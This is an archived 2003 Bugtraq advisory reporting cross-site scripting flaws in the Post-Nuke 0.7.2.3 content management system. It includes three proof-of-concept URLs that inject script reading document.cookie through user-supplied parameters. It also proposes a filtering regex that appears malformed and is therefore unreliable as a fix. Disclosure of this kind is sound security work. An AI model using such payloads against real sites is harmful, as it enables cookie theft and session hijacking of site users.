| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <027101c33196$7de15280$49082150@lonestar0>
Date: Fri, 13 Jun 2003 12:28:09 +0200
From: "David F. Madrid" <idoru@...eosoft.net.uy>
To: <bugtraq@...urityfocus.com>
Subject: Cross site scripting in Post-Nuke
Issue :
Cross site scripting in Post-Nuke
Version affected :
Post Nuke 0.7.2.3-Phoenix
Description :
Post-Nuke is a content management system that allow
you to deploy a website easily . Its developers claim
that their product is more secure than competitors .
I found three places when a script can be injected to
be executed in the context of the webpage , making possible
to steal user cookies and hijack their sessions .
http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22
%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@...u
cas.com
http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&i
d_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent
_id=0
http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert
(document.cookie);%3E&op=modload&name=Members_List&file=index
Solution :
Althoug I am not a php developer , I think filtering of all not
alfanumeric characters is needed , not just filtering script
tags passed to vars in the url .
$good_var=eregi_replace("[^a-z0-9]+)and([^a-z0-9]+)","0",$var);
You can find a spanish version of this advisory at
http://nautopia.org/vulnerabilidades/postnuke_xss.htm
Regards ,
David F. Madrid ,
Madrid , Spain
Powered by blists - more mailing lists